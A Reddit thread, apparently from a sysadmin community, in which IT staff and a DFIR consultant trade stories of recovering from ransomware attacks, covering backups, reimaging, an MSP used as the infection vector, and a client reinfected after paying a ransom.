That Crowdstrike hit was the worst! /s
illicITparameters@reddit
Which time?
Thank fuck the 3 times I’ve had to do it, it wasn’t my fault 🤣🤣
Thankfully only 1 times was there substantial data loss, but it didn’t impact revenue for that place which is all the execs cared about. It did make other peoples’ jobs harder for up to 3yrs after the fact, though.
FarJeweler9798@reddit
Once, I kinda enjoyed it because you were only on the task all the time, no one stopped you 8n teams to so anything else. cleaning/checking about 4k computers and returning hundreds and hundreds of servers. Backups well there was some... Lots of the servers we did just from clean as they were running on old OS
doobjank@reddit
I worked for a nonprofit as IT for a while and a bookkeeper got ransomware. I just had to get Microsoft to roll them back. Took a few weeks but wasn't too bad
LurkerWiZard@reddit
Went through it about 5 years ago. It's terrible. My backups were good, as were my snapshots. Everything was hosed.
A week to get virtual environment back online and VIP systems/services restored. End of second week everything was back. A month in and quirks resolved. As others stated, slept at the office. Somebody kept me supplied with protein bars and caffeine.
It ain't for the weak, that's for sure. 😬
shinyviper@reddit
DFIR consultant here. Had three this summer alone. Ransomware definitely picking up as cybersecurity insurance becoming the norm and threat actors more likely to get paid. And yes, both sides, investigation AND remediation suck.
cidknee1@reddit (OP)
Yeah, it sucks. And its becoming very very common here for insurance companies to require it and specific things on the network like patch level, specific OS, lots of stuff.
budlight2k@reddit
3 times now. I'm getting quite good at it.
One of them wiped out a national company and was absolutely sure to complacency. I got questioned because I told them what could happen in detail before it did.
mustang__1@reddit
Twice. Once was just a file share, restored the backup and moved on.
The other.... The other used our old msp they we barely used for break fix as a vector. They had a compromised kaseya server (about a year before the big one) and hit thousands of end points the msp had touched. I had some pet workstations backed up.... To an external drive.... That just so happened to be plugged in.
The msp managed our datto backups. I started calling at 7am when I was notified we were hit. By 9am I still hasn't heard back or had an answer after calling on the half hour. So I drove over and found out they were the vector.... And got my backups rolling. But they kept restoring the wrong server images.
Additional complications were I couldn't find a w7 64b disk and at the time was still avoiding w10.
By Wednesday I stopped going home and just slept at the office on couches. We were functioning again by Friday. Took me another month to get all the little shit sorted.
RustyU@reddit
I've only had to deal with it once. It wasn't a huge company and their backups were solid so it wasn't that big a job, just annoying.
WYOutdoorGuy@reddit
We were just under two weeks total time to restore back to functioning. About a month before we were "normal" ops again. Still cleaning up bits and closing missed loopholes as I find them.
Jayhawker_Pilot@reddit
Just saying ransomware and my PTSD is triggered. If it happens again where I am, I am retiring on the spot. Once was more than enough.
cidknee1@reddit (OP)
I had one, larger client. 150 ish machines. All infected. Servers hadn't been patched in 4 years (management wouldnt let them as it's good enough). They paid and got it back (1.3 mil) and 3 days after we get it back up and running some idiot brings his laptop in and bam, reinfects everything.
So we fixed it again...wipe reload etc. 2 weeks later...same thing. CEO called everyone personally and told them to bring their laptop in right now or they are fired. Lets just say they take it pretty seriously. I know one of the IT guys there and they get everything they need to keep the company going. Upgrades, maint, etc.
Apotrox@reddit
Took 5 days in >12h shifts to get everything back up and running for people to work again. Rebuild everything from scratch on new HW which was due anyways. Took weeks to migrate the edb from on prem exch2010 to exch2019. Ended up just using third party software to export to pst. A character building experience to say the least.
Didn't bother contacting the group nor did we have insurance. Only reported it to the police for documentation.
cidknee1@reddit (OP)
Yeah luckily our soc notified us and they tried to isolate the network, but only did one server. I went in after and said wtf! and disabled the nics on the hosts. That killed it in it' tracks. Our backup server wasn't effected, and we have 365 so that's an easy fix.
Thank god they just upgraded 90% of the computers from old i7 4th gen mechanicals to 12th gen i7 and i9 with 64gb ram on nvme a couple months ago. Otherwise i'd still be there. Now it's just the little stuff like setting up the programs for the CAM machines etc. Still a pain but the end is in sight.
Apotrox@reddit
Godspeed to you friend.
abyssea@reddit
Yeah multiple times. Just pxe and reimage the machine. Everything should be saved on network shares/cloud service, not on the endpoints.
fishingforbeerstoday@reddit
Not quite there for the event but i started my current job 1 month after they suffered an attack. Everything was built from the ground up. Which served me in the sense that I was still getting used to the environment as a new employee.